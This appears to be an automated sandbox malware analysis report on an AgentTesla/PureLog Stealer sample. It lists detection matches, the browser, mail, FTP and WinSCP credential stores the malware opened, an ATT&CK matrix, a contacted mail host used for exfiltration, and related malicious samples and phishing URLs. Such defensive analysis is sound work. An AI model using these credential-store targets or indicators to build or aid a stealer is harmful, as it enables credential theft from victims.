Source: Yara match	File source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: GkYUK8VCrO.exe	Binary or memory string: WIN_81
Source: GkYUK8VCrO.exe	Binary or memory string: WIN_XP
Source: GkYUK8VCrO.exe	Binary or memory string: WIN_XPe
Source: GkYUK8VCrO.exe	Binary or memory string: WIN_VISTA
Source: GkYUK8VCrO.exe	Binary or memory string: WIN_7
Source: GkYUK8VCrO.exe	Binary or memory string: WIN_8
Source: GkYUK8VCrO.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4151126152.000000000347C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7516, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2ffef4e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.2fffe36.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5900000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.5870ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Contains VNC / remote desktop functionality (version string found)

Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000045B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004737000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004757000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004797000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004657000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004597000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004431000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000045F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004677000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.0000000004617000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V
Source: RegSvcs.exe, 00000003.00000002.4152521685.00000000046F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: 65rvNc32ukXWoW8AS/uI41utpyYgRz/h+tfLuUp6yZ9FRjaL5XZLsZnhvxBqt7rlva3V

Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B16596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_00B16596
Source: C:\Users\user\Desktop\GkYUK8VCrO.exe	Code function: 0_2_00B16A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00B16A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	2 Valid Accounts	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	221 Input Capture	1 Account Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	2 Valid Accounts	2 Obfuscated Files or Information	1 Credentials in Registry	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	1 Software Packing	NTDS	148 System Information Discovery	Distributed Component Object Model	221 Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	251 Security Software Discovery	SSH	4 Clipboard Data	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Valid Accounts	Cached Domain Credentials	121 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	23 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	121 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
GkYUK8VCrO.exe	42%	ReversingLabs	Win32.Trojan.Autoit
GkYUK8VCrO.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
https://api.ipify.org	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://mail.fasmacopy.gr	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mail.fasmacopy.gr	79.170.44.32	true	true		unknown
api.ipify.org	104.26.12.205	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.ipify.org	RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	RegSvcs.exe, 00000003.00000002.4153513364.0000000005870000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152521685.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4153770965.0000000005900000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150816380.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.fasmacopy.gr	RegSvcs.exe, 00000003.00000002.4151126152.00000000034DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000369F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000038BB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003580000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.000000000373D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.0000000003959000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151126152.00000000037E5000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.4151126152.0000000003431000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.26.12.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false
79.170.44.32	mail.fasmacopy.gr	United Kingdom		20773	GODADDYDE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1465576
Start date and time:	2024-07-01 20:24:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	GkYUK8VCrO.exe renamed because original name is a hash value
Original Sample Name:	7d50650cd2ba63482d4caf875ae65a8e.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/6@2/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 60 Number of non-executed functions: 263
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: GkYUK8VCrO.exe

Simulations

Behavior and APIs

Time	Type	Description
14:25:18	API Interceptor	12832277x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.26.12.205	SecuriteInfo.com.Win64.RansomX-gen.22171.1307.exe	Get hash	malicious	Conti, PureLog Stealer, Targeted Ransomware	Browse	api.ipify.org/
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	482730621.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sonic-Glyder.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	Sky-Beta.exe	Get hash	malicious	Stealit	Browse	api.ipify.org/?format=json
	SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exe	Get hash	malicious	Bunny Loader	Browse	api.ipify.org/
	lods.cmd	Get hash	malicious	Remcos	Browse	api.ipify.org/
79.170.44.32	RFQ_4155965-EU2406.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	ltd93En22P.exe	Get hash	malicious	AgentTesla	Browse
	ejXrW4Jf9o.exe	Get hash	malicious	AgentTesla	Browse
	U39qqK8E7o.exe	Get hash	malicious	AgentTesla	Browse
	RFQ-P023102417.doc	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	PO 4500005168 NIKOLA.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	rQoutation.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	F46VBJ6Yvy.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	8w5wHh755H.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	gB49zgUhr8.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	AdhP1WMUi5.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	doc -scan file.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Drawing specification and June PO #07329.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	104.26.12.205
	IMG_067_6331002.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	MV RIVA WIND - VESSEL's PARTICULARS.PDF.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
mail.fasmacopy.gr	RFQ_4155965-EU2406.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	79.170.44.32
	ltd93En22P.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	ejXrW4Jf9o.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	U39qqK8E7o.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	RFQ-P023102417.doc	Get hash	malicious	AgentTesla	Browse	79.170.44.32

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GODADDYDE	RFQ_4155965-EU2406.xlsx	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	79.170.44.32
	qoe1X4ig0N.exe	Get hash	malicious	LummaC, AsyncRAT, DarkTortilla, LummaC Stealer, Njrat, SmokeLoader, StormKitty	Browse	176.29.154.25
	ltd93En22P.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	ejXrW4Jf9o.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	U39qqK8E7o.exe	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	RFQ-P023102417.doc	Get hash	malicious	AgentTesla	Browse	79.170.44.32
	V4zFzdCyty.elf	Get hash	malicious	Mirai, Moobot	Browse	178.77.110.221
	mrPTE618YB.exe	Get hash	malicious	PureLog Stealer	Browse	79.170.44.218
	doTtQFWKly.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Glupteba, SmokeLoader, Vidar, Xehook Stealer	Browse	176.29.154.25
	https://app12.runmags.com/	Get hash	malicious	Unknown	Browse	85.195.101.122
CLOUDFLARENETUS	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.148.197
	https://forms.promo-pharmacies.gr/6659c951cdd608959f27a77d	Get hash	malicious	Unknown	Browse	188.114.96.3
	Bank Slip 2.doc	Get hash	malicious	Snake Keylogger	Browse	104.21.53.203
	Attachment_8378637861.170631.HTM	Get hash	malicious	Unknown	Browse	104.17.25.14
	INQUIRY#809676-JULY1.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.11.106
	https://click.pstmrk.it/3s/marryatbali.com%2Fdev%2F/EUHQ/Il62AQ/AQ/b5b2a7e4-6441-4a86-be73-2bf498fd1e9a/1/MLzcqAxPmj	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDd8ji5dO-2BtGjFwdkKxtwV-2BT-2FIDZLBFuspWHIOxNeRRYzjnPYwPcANsM7g6bBF5Eb-2FtBeYO84se-2BxM2-2FftOX61g3tKjw4-2BmFTEe65zPmmIV01t1qMegNLN27WQA4-2BWSzp8Exonts6yxo7jLDqmXJMwdw-3DSDkl_fylF09WDx4VRLHs1TE6by-2Fm24mY0V6PaWh-2BQeqn0Ay-2FMm-2FGvFUfwxkNWNqnFtCc1bg3RDtukBd6YTikFNr9njJPj8fPjtMTy7wESEphTN1Xt33p1RcATr-2Faa6esQ5neBHfE9PchIfWN2pGu-2FDyTo9jBl7IxKpEon9SyD5nvMkxE22jB5lqUsSt3NSAbiAi6xLdjPQNgUE2zZRGhN5aAjyw-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://endress-dot-polynomial-net-415922.uk.r.appspot.com/	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://url2530.tvsmotor.com/ls/click?upn=u001.smInq0-2BkNc5oRshkzMLE7U6zcio2-2F9zwu1ZIXUanV0NJI-2BOrcqj0f4SCu-2B-2BWZYRJ5WulbQ5i5mBsK1zXEak-2FiMRG64aR-2FUGiDgoHteplEfqii9y-2FZm8OviJTU1sjmz7jpaYlxIO-2FZqsCEMZLobIAuBKqKOl6jqYqSAHVwBkUZuGRzhvuesvLIb-2BOJaFEug0CnemcJJ-2FkU8Glr1M3HQvGDZIRt5HYOjqWnCYPyN2LzfWA5WJpqP15j9jckbuN-2BOb3WHvq-2F0cJQJdn87kO0MSPy0cFUfIeq9yRYQqhn4htwvkWsNx-2FFam80MMPtdHc4W-2BjtofBO6rARCMSHyY6bevTzA-3D-3Dl5B0_ZmIHaGi20aqBKA3sG1JfXxzr0sPFOA2uIfsKnhz-2FHsHlNN56Un7vVp-2FHLlgOEVpr0kMJXFtRNAtOmyfAL3Lkes92MiYR3EbwQLlO4as4ETAbkJiOU1P-2F6SWFB0T3LaiXQjVG47m8S-2B1KmL8spseUk6IF4zRohQ-2B-2FFQktOHSnuyuc8HWSvn8BvqxHU3iGIxrIS-2FUCmGYTBpWBLsLVoZYmGg-3D-3D	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	8hd98EhtIFcYkb8.exe	Get hash	malicious	FormBook	Browse	172.67.194.145

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	https://forms.promo-pharmacies.gr/6659c951cdd608959f27a77d	Get hash	malicious	Unknown	Browse	104.26.12.205
